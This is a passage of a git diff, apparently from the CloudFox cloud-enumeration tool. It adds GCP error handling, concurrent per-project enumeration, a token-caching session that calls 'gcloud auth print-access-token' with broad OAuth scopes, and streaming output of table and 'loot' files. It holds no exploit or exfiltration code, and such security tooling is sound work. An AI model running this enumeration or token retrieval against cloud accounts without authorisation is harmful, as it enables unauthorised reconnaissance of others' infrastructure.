h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= +google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= +google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217 h1:GvESR9BIyHUahIb0NcTum6itIWtdoglGX+rnGxm2934= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217/go.mod 
h1:yJ2HH4EHEDTd3JiLmhds6NkJ17ITVYOdV3m3VKOnws0= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk= +google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= +google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= google.golang.org/grpc v1.77.0 h1:wVVY6/8cGA6vvffn+wWK5ToddbgdU3d8MNENr4evgXM= google.golang.org/grpc v1.77.0/go.mod h1:z0BY1iVj0q8E1uSQCjL9cppRj+gnZjzDnzV0dHhrNig= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod 
h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= @@ -529,3 +622,5 @@ gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/internal/gcp/base.go b/internal/gcp/base.go new file mode 100644 index 00000000..5eef0901 --- /dev/null +++ b/internal/gcp/base.go @@ -0,0 +1,391 @@ +package gcpinternal + +import ( + "context" + "errors" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + "github.com/spf13/cobra" + "google.golang.org/api/googleapi" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// ------------------------------ +// Common GCP API Error Types +// ------------------------------ +var ( + ErrAPINotEnabled = errors.New("API not enabled") + ErrPermissionDenied = errors.New("permission denied") + ErrNotFound = errors.New("resource not found") +) + +// ParseGCPError converts GCP API errors into cleaner, standardized error types +// This should be used by all GCP service modules for consistent error handling +// Handles both REST API errors (googleapi.Error) and gRPC errors (status.Error) +func 
ParseGCPError(err error, apiName string) error { + if err == nil { + return nil + } + + // Check for gRPC status errors (used by Cloud Asset, Spanner, and other gRPC-based APIs) + if grpcStatus, ok := status.FromError(err); ok { + errStr := err.Error() + + switch grpcStatus.Code() { + case codes.PermissionDenied: + // Check for SERVICE_DISABLED in error details or message + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Check for quota project requirement (API not enabled or misconfigured) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (enable API or set quota project)", ErrAPINotEnabled, apiName) + } + return ErrPermissionDenied + + case codes.NotFound: + return ErrNotFound + + case codes.Unauthenticated: + return fmt.Errorf("authentication failed - check credentials") + + case codes.ResourceExhausted: + return fmt.Errorf("rate limited - too many requests") + + case codes.Unavailable, codes.Internal: + return fmt.Errorf("GCP service error: %s", grpcStatus.Message()) + + case codes.InvalidArgument: + return fmt.Errorf("bad request: %s", grpcStatus.Message()) + } + + // Default: return cleaner error message + return fmt.Errorf("gRPC error (%s): %s", grpcStatus.Code().String(), grpcStatus.Message()) + } + + // Check for REST API errors (googleapi.Error) + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + errStr := googleErr.Error() + + switch googleErr.Code { + case 403: + // Check for SERVICE_DISABLED first - this is usually the root cause + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + // Permission denied + if strings.Contains(errStr, "PERMISSION_DENIED") || + strings.Contains(errStr, "does not have") || + strings.Contains(errStr, "permission") { + return ErrPermissionDenied + } + // Generic 403 + return ErrPermissionDenied + + case 404: + return ErrNotFound + + case 400: + 
return fmt.Errorf("bad request: %s", googleErr.Message) + + case 429: + return fmt.Errorf("rate limited - too many requests") + + case 500, 502, 503, 504: + return fmt.Errorf("GCP service error (code %d)", googleErr.Code) + } + + // Default: return cleaner error message + return fmt.Errorf("API error (code %d): %s", googleErr.Code, googleErr.Message) + } + + // Fallback: check error string for common patterns + errStr := err.Error() + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "PermissionDenied") { + return ErrPermissionDenied + } + + return err +} + +// HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue +// Returns false if the error is fatal and the caller should stop processing +func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { + if err == nil { + return true // No error, continue + } + + switch { + case errors.Is(err, ErrAPINotEnabled): + logger.ErrorM(fmt.Sprintf("%s - API not enabled", resourceDesc), moduleName) + return false // Can't continue without API enabled + + case errors.Is(err, ErrPermissionDenied): + logger.ErrorM(fmt.Sprintf("%s - permission denied", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(err, ErrNotFound): + // Not found is often expected, don't log as error + return true + + default: + logger.ErrorM(fmt.Sprintf("%s: %v", resourceDesc, err), moduleName) + return true // Continue with other resources + } +} + +// ------------------------------ +// CommandContext holds all common initialization data for GCP commands +// ------------------------------ +type CommandContext struct { + // Context and logger + Ctx context.Context + Logger internal.Logger + + // Project information + ProjectIDs []string + ProjectNames map[string]string // 
ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration flags + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int +} + +// ------------------------------ +// BaseGCPModule - Embeddable struct with common fields for all GCP modules +// ------------------------------ +// This struct eliminates duplicate field declarations across modules. +// Modules embed this struct instead of declaring these fields individually. +// +// Usage: +// +// type BucketsModule struct { +// gcpinternal.BaseGCPModule // Embed the base fields +// +// // Module-specific fields +// Buckets []BucketInfo +// mu sync.Mutex +// } +type BaseGCPModule struct { + // Project and identity + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email + + // Configuration + Verbosity int + WrapTable bool + OutputDirectory string + Format string + Goroutines int + + // Progress tracking (AWS/Azure style) + CommandCounter internal.CommandCounter +} + +// GetProjectName returns the display name for a project ID, falling back to the ID if not found +func (b *BaseGCPModule) GetProjectName(projectID string) string { + if b.ProjectNames != nil { + if name, ok := b.ProjectNames[projectID]; ok { + return name + } + } + return projectID +} + +// ------------------------------ +// NewBaseGCPModule - Helper to create BaseGCPModule from CommandContext +// ------------------------------ +func NewBaseGCPModule(cmdCtx *CommandContext) BaseGCPModule { + return BaseGCPModule{ + ProjectIDs: cmdCtx.ProjectIDs, + ProjectNames: cmdCtx.ProjectNames, + Account: cmdCtx.Account, + Verbosity: cmdCtx.Verbosity, + WrapTable: cmdCtx.WrapTable, + OutputDirectory: cmdCtx.OutputDirectory, + Format: cmdCtx.Format, + Goroutines: cmdCtx.Goroutines, + } +} + +// ------------------------------ +// ProjectProcessor - Callback function type for processing individual projects +// 
------------------------------ +type ProjectProcessor func(ctx context.Context, projectID string, logger internal.Logger) + +// ------------------------------ +// RunProjectEnumeration - Orchestrates enumeration across multiple projects with concurrency +// ------------------------------ +// This method centralizes the project enumeration orchestration pattern. +// It handles WaitGroup, semaphore, spinner, and CommandCounter management automatically. +// +// Usage: +// +// func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { +// m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) +// m.writeOutput(ctx, logger) +// } +func (b *BaseGCPModule) RunProjectEnumeration( + ctx context.Context, + logger internal.Logger, + projectIDs []string, + moduleName string, + processor ProjectProcessor, +) { + logger.InfoM(fmt.Sprintf("Enumerating resources for %d project(s)", len(projectIDs)), moduleName) + + // Setup synchronization primitives + var wg sync.WaitGroup + semaphore := make(chan struct{}, b.Goroutines) + + // Start progress spinner + spinnerDone := make(chan bool) + go internal.SpinUntil(moduleName, &b.CommandCounter, spinnerDone, "projects") + + // Process each project with goroutines + for _, projectID := range projectIDs { + b.CommandCounter.Total++ + b.CommandCounter.Pending++ + wg.Add(1) + + go func(project string) { + defer func() { + b.CommandCounter.Executing-- + b.CommandCounter.Complete++ + wg.Done() + }() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + b.CommandCounter.Pending-- + b.CommandCounter.Executing++ + + // Call the module-specific processor + processor(ctx, project, logger) + }(projectID) + } + + // Wait for all projects to complete + wg.Wait() + + // Stop spinner + spinnerDone <- true + <-spinnerDone +} + +// ------------------------------ +// parseMultiValueFlag parses a flag value that can contain comma-separated +// and/or 
space-separated values +// ------------------------------ +func parseMultiValueFlag(flagValue string) []string { + if flagValue == "" { + return nil + } + + // Replace commas with spaces, then split by whitespace + normalized := strings.ReplaceAll(flagValue, ",", " ") + fields := strings.Fields(normalized) + + // Deduplicate while preserving order + seen := make(map[string]bool) + result := []string{} + for _, field := range fields { + if !seen[field] { + seen[field] = true + result = append(result, field) + } + } + return result +} + +// ------------------------------ +// InitializeCommandContext - Eliminates duplicate initialization code across commands +// ------------------------------ +// This helper extracts flags, resolves projects and account info. +// +// Usage: +// +// cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) +// if err != nil { +// return // error already logged +// } +func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandContext, error) { + ctx := cmd.Context() + logger := internal.NewLogger() + + // -------------------- Extract flags -------------------- + parentCmd := cmd.Parent() + verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") + wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") + outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") + format, _ := parentCmd.PersistentFlags().GetString("output") + + // Default to "all" format if not set (GCP doesn't expose this flag yet) + if format == "" { + format = "all" + } + + // -------------------- Get project IDs from context -------------------- + var projectIDs []string + if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { + projectIDs = value + } else { + logger.ErrorM("Could not retrieve projectIDs from context or value is empty", moduleName) + return nil, fmt.Errorf("no project IDs provided") + } + + // -------------------- Get project names from context 
-------------------- + var projectNames map[string]string + if value, ok := ctx.Value("projectNames").(map[string]string); ok { + projectNames = value + } else { + // Initialize empty map if not provided - modules can still work without names + projectNames = make(map[string]string) + for _, id := range projectIDs { + projectNames[id] = id // fallback to using ID as name + } + } + + // -------------------- Get account from context -------------------- + var account string + if value, ok := ctx.Value("account").(string); ok { + account = value + } else { + logger.ErrorM("Could not retrieve account email from context", moduleName) + // Don't fail - some modules can continue without account info + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Resolved %d project(s), account: %s", len(projectIDs), account), moduleName) + } + + // -------------------- Build and return context -------------------- + return &CommandContext{ + Ctx: ctx, + Logger: logger, + ProjectIDs: projectIDs, + ProjectNames: projectNames, + Account: account, + Verbosity: verbosity, + WrapTable: wrap, + OutputDirectory: outputDirectory, + Format: format, + Goroutines: 5, // Default concurrency + }, nil +} diff --git a/internal/gcp/session.go b/internal/gcp/session.go new file mode 100644 index 00000000..81640420 --- /dev/null +++ b/internal/gcp/session.go @@ -0,0 +1,442 @@ +package gcpinternal + +import ( + "context" + "encoding/json" + "fmt" + "os/exec" + "strings" + "sync" + "time" + + "golang.org/x/oauth2" + "golang.org/x/oauth2/google" + "google.golang.org/api/option" +) + +// CommonScopes defines the common OAuth scopes used by GCP services +var CommonScopes = []string{ + "https://www.googleapis.com/auth/cloud-platform", // Full GCP access + "https://www.googleapis.com/auth/cloud-platform.read-only", // Read-only GCP access + "https://www.googleapis.com/auth/compute", // Compute Engine access + "https://www.googleapis.com/auth/devstorage.full_control", 
// Cloud Storage full access +} + +// SafeSession provides thread-safe GCP authentication with token caching and auto-refresh +type SafeSession struct { + mu sync.Mutex + tokenSource oauth2.TokenSource + currentToken *oauth2.Token + tokens map[string]*oauth2.Token // scope -> token + sessionExpiry time.Time // When the current token expires + monitoring bool // Whether background monitoring is active + stopMonitor chan struct{} // Signal to stop monitoring + refreshBuffer time.Duration // How early to refresh before expiry (default 5 min) + + // Identity info + email string + projectID string + accountType string // "user" or "serviceAccount" +} + +// GCPCredentialInfo holds information about the current credential +type GCPCredentialInfo struct { + Email string `json:"email"` + AccountType string `json:"account_type"` // user, serviceAccount + ProjectID string `json:"project_id"` + Scopes []string +} + +// StaticTokenSource wraps a token for use with GCP clients +type StaticTokenSource struct { + StaticToken *oauth2.Token +} + +// Token returns the static token (implements oauth2.TokenSource) +func (s *StaticTokenSource) Token() (*oauth2.Token, error) { + return s.StaticToken, nil +} + +// NewSafeSession initializes a session using Application Default Credentials +// and prefetches tokens for common scopes +func NewSafeSession(ctx context.Context) (*SafeSession, error) { + // Check if gcloud is authenticated + if !IsSessionValid() { + return nil, fmt.Errorf("GCP session invalid; run 'gcloud auth application-default login' or 'gcloud auth login'") + } + + // Create token source from ADC + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) 
+ if err != nil { + return nil, fmt.Errorf("failed to create token source: %w", err) + } + + ss := &SafeSession{ + tokenSource: ts, + tokens: make(map[string]*oauth2.Token), + refreshBuffer: 5 * time.Minute, + stopMonitor: make(chan struct{}), + } + + // Get initial token and extract expiry + token, err := ts.Token() + if err != nil { + return nil, fmt.Errorf("failed to get initial token: %w", err) + } + ss.currentToken = token + ss.sessionExpiry = token.Expiry + + // Get identity info + info, err := ss.getCurrentIdentity(ctx) + if err == nil { + ss.email = info.Email + ss.accountType = info.AccountType + ss.projectID = info.ProjectID + } + + // Cache the token for the default scope + ss.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return ss, nil +} + +// NewSmartSession creates a session with automatic monitoring and refresh +func NewSmartSession(ctx context.Context) (*SafeSession, error) { + ss, err := NewSafeSession(ctx) + if err != nil { + return nil, err + } + + // Start background monitoring + ss.StartMonitoring(ctx) + + return ss, nil +} + +// ------------------------- TOKEN METHODS ------------------------- + +// GetToken returns a valid access token, refreshing if necessary +func (s *SafeSession) GetToken(ctx context.Context) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + return s.getTokenUnlocked(ctx) +} + +// getTokenUnlocked returns a token without locking (caller must hold lock) +func (s *SafeSession) getTokenUnlocked(ctx context.Context) (string, error) { + // Check if current token is still valid + if s.currentToken != nil && s.currentToken.Valid() { + return s.currentToken.AccessToken, nil + } + + // Refresh the token + token, err := s.tokenSource.Token() + if err != nil { + return "", fmt.Errorf("failed to refresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + return token.AccessToken, nil +} + +// GetTokenForScope returns a token for a specific OAuth scope +func (s 
*SafeSession) GetTokenForScope(ctx context.Context, scope string) (string, error) { + s.mu.Lock() + defer s.mu.Unlock() + + // Check cache first + if tok, ok := s.tokens[scope]; ok && tok.Valid() { + return tok.AccessToken, nil + } + + // Get a new token source for this scope + ts, err := google.DefaultTokenSource(ctx, scope) + if err != nil { + return "", fmt.Errorf("failed to create token source for scope %s: %w", scope, err) + } + + token, err := ts.Token() + if err != nil { + return "", fmt.Errorf("failed to get token for scope %s: %w", scope, err) + } + + // Cache the token + s.tokens[scope] = token + + return token.AccessToken, nil +} + +// GetTokenSource returns the underlying token source for use with GCP clients +func (s *SafeSession) GetTokenSource() oauth2.TokenSource { + return s.tokenSource +} + +// GetClientOption returns a client option for use with GCP API clients +func (s *SafeSession) GetClientOption() option.ClientOption { + return option.WithTokenSource(s.tokenSource) +} + +// GetTokenWithRetry attempts to get a token with automatic retry on failure +func (s *SafeSession) GetTokenWithRetry(ctx context.Context) (string, error) { + token, err := s.GetToken(ctx) + if err != nil { + // Try to refresh session and retry once + if refreshErr := s.RefreshSession(ctx); refreshErr == nil { + token, err = s.GetToken(ctx) + } + } + return token, err +} + +// ------------------------- SESSION MANAGEMENT ------------------------- + +// Ensure validates or refreshes the current session +func (s *SafeSession) Ensure(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + if s.currentToken != nil && s.currentToken.Valid() { + return nil + } + + // Try to get a new token + token, err := s.tokenSource.Token() + if err != nil { + return fmt.Errorf("GCP session invalid or expired: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + return nil +} + +// IsSessionExpired checks if the session has expired or will expire soon +func (s 
*SafeSession) IsSessionExpired() bool { + s.mu.Lock() + defer s.mu.Unlock() + + if s.sessionExpiry.IsZero() { + return false + } + + // Consider expired if within refresh buffer + return time.Now().Add(s.refreshBuffer).After(s.sessionExpiry) +} + +// RefreshSession refreshes the token and clears the cache +func (s *SafeSession) RefreshSession(ctx context.Context) error { + s.mu.Lock() + defer s.mu.Unlock() + + // Check if gcloud session is still valid + if !IsSessionValid() { + return fmt.Errorf("GCP session expired; please run 'gcloud auth login' or 'gcloud auth application-default login'") + } + + // Create new token source + ts, err := google.DefaultTokenSource(ctx, CommonScopes...) + if err != nil { + return fmt.Errorf("failed to create token source: %w", err) + } + s.tokenSource = ts + + // Get fresh token + token, err := ts.Token() + if err != nil { + return fmt.Errorf("failed to get fresh token: %w", err) + } + + s.currentToken = token + s.sessionExpiry = token.Expiry + + // Clear token cache + s.tokens = make(map[string]*oauth2.Token) + s.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return nil +} + +// ------------------------- MONITORING ------------------------- + +// StartMonitoring begins background monitoring of session health +func (s *SafeSession) StartMonitoring(ctx context.Context) { + s.mu.Lock() + if s.monitoring { + s.mu.Unlock() + return + } + s.monitoring = true + s.mu.Unlock() + + go s.monitorSession(ctx) +} + +// StopMonitoring stops the background session monitor +func (s *SafeSession) StopMonitoring() { + s.mu.Lock() + defer s.mu.Unlock() + + if !s.monitoring { + return + } + + s.monitoring = false + close(s.stopMonitor) +} + +// monitorSession runs in background to monitor and refresh session +func (s *SafeSession) monitorSession(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-s.stopMonitor: + return + case <-ctx.Done(): + return + case 
<-ticker.C: + if s.IsSessionExpired() { + if err := s.RefreshSession(ctx); err != nil { + fmt.Printf("smart session: auto-refresh failed: %v\n", err) + fmt.Println("smart session: please run 'gcloud auth login' to re-authenticate") + } + } + } + } +} + +// ------------------------- IDENTITY INFO ------------------------- + +// GetEmail returns the email of the authenticated identity +func (s *SafeSession) GetEmail() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.email +} + +// GetAccountType returns the type of account (user or serviceAccount) +func (s *SafeSession) GetAccountType() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.accountType +} + +// GetProjectID returns the default project ID +func (s *SafeSession) GetProjectID() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.projectID +} + +// GetSessionExpiry returns when the current token expires +func (s *SafeSession) GetSessionExpiry() time.Time { + s.mu.Lock() + defer s.mu.Unlock() + return s.sessionExpiry +} + +// getCurrentIdentity retrieves identity info from gcloud +func (s *SafeSession) getCurrentIdentity(ctx context.Context) (*GCPCredentialInfo, error) { + // Try gcloud auth list to get current account + out, err := exec.CommandContext(ctx, "gcloud", "auth", "list", "--filter=status:ACTIVE", "--format=json").Output() + if err != nil { + return nil, fmt.Errorf("failed to get gcloud auth list: %w", err) + } + + var accounts []struct { + Account string `json:"account"` + Status string `json:"status"` + } + if err := json.Unmarshal(out, &accounts); err != nil { + return nil, fmt.Errorf("failed to parse gcloud auth list: %w", err) + } + + info := &GCPCredentialInfo{} + if len(accounts) > 0 { + info.Email = accounts[0].Account + // Determine account type from email format + if strings.Contains(info.Email, ".iam.gserviceaccount.com") { + info.AccountType = "serviceAccount" + } else { + info.AccountType = "user" + } + } + + // Get default project + projectOut, err := 
exec.CommandContext(ctx, "gcloud", "config", "get-value", "project").Output() + if err == nil { + info.ProjectID = strings.TrimSpace(string(projectOut)) + } + + return info, nil +} + +// CurrentUser returns the current identity's email and account type +func (s *SafeSession) CurrentUser(ctx context.Context) (email, accountType string, err error) { + info, err := s.getCurrentIdentity(ctx) + if err != nil { + return "UNKNOWN", "UNKNOWN", err + } + return info.Email, info.AccountType, nil +} + +// ------------------------- HELPER FUNCTIONS ------------------------- + +// IsSessionValid checks if gcloud is authenticated +func IsSessionValid() bool { + // Check if we can get a token via gcloud + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return false + } + + token := strings.TrimSpace(string(out)) + return token != "" && !strings.Contains(token, "ERROR") +} + +// IsADCConfigured checks if Application Default Credentials are configured +func IsADCConfigured() bool { + ctx := context.Background() + _, err := google.DefaultTokenSource(ctx, "https://www.googleapis.com/auth/cloud-platform") + return err == nil +} + +// GetDefaultProject returns the default GCP project from gcloud config +func GetDefaultProject() string { + out, err := exec.Command("gcloud", "config", "get-value", "project").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetDefaultAccount returns the default account from gcloud config +func GetDefaultAccount() string { + out, err := exec.Command("gcloud", "config", "get-value", "account").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetAccessToken returns a fresh access token from gcloud CLI +// This is useful for REST API calls that need a bearer token +func GetAccessToken() (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return "", fmt.Errorf("failed 
to get access token: %w", err) + } + return strings.TrimSpace(string(out)), nil +} + +// GetAccessTokenForAccount returns an access token for a specific account +func GetAccessTokenForAccount(account string) (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token", "--account", account).Output() + if err != nil { + return "", fmt.Errorf("failed to get access token for account %s: %w", account, err) + } + return strings.TrimSpace(string(out)), nil +} diff --git a/internal/log.go b/internal/log.go index 9b89fe4e..007ff275 100644 --- a/internal/log.go +++ b/internal/log.go @@ -72,7 +72,9 @@ func (l *Logger) Error(text string) { func (l *Logger) ErrorM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) - l.txtLog.Printf("[%s] %s", module, text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } } func (l *Logger) Fatal(text string) { @@ -81,7 +83,9 @@ func (l *Logger) Fatal(text string) { func (l *Logger) FatalM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - l.txtLog.Printf("[%s] %s", module, text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) os.Exit(1) } diff --git a/internal/output2.go b/internal/output2.go index 1cce6b57..3b1929b1 100644 --- a/internal/output2.go +++ b/internal/output2.go @@ -1,6 +1,7 @@ package internal import ( + "bufio" "encoding/csv" "encoding/json" "fmt" @@ -9,6 +10,7 @@ import ( "path/filepath" "regexp" "strings" + "sync" "github.com/aquasecurity/table" "github.com/fatih/color" @@ -23,6 +25,9 @@ var fileSystem = afero.NewOsFs() // Color functions var cyan = color.New(color.FgCyan).SprintFunc() +// global lock to prevent concurrent write races +var lootFileMu sync.Mutex + type OutputClient struct { Verbosity int 
CallingModule string @@ -59,6 +64,20 @@ type LootFile struct { Contents string } +// TableCol represents a column definition for table output +type TableCol struct { + Name string + Width int +} + +// TableFiles represents table output configuration +type TableFiles struct { + Directory string + TableCols []TableCol + ResultsFile string + LootFile string +} + // TODO support datastructures that enable brief or wide format type CloudfoxOutput interface { TableFiles() []TableFile @@ -102,6 +121,425 @@ func HandleOutput( return nil } +// HandleStreamingOutput writes table and loot files incrementally, then finalizes tables at the end. +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func HandleStreamingOutput( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(dataToOutput.TableFiles()) > 0 { + baseCloudfoxModule = dataToOutput.TableFiles()[0].Name + } + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + if err := os.MkdirAll(outDirectoryPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // ---- STREAM ROWS TO TEMP FILES ---- + for _, t := range dataToOutput.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + tmpTablePath := 
filepath.Join(outDirectoryPath, safeName+".tmp") + if err := os.MkdirAll(filepath.Dir(tmpTablePath), 0o755); err != nil { + return fmt.Errorf("failed to create parent directory for temp table: %w", err) + } + + tmpTableFile, err := os.OpenFile(tmpTablePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open temporary table file: %w", err) + } + defer tmpTableFile.Close() + + // Append each row into the tmp file + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + if _, err := tmpTableFile.WriteString(strings.Join(cleanRow, ",") + "\n"); err != nil { + return fmt.Errorf("failed to append row to tmp table: %w", err) + } + } + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outDirectoryPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + defer csvFile.Close() + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = 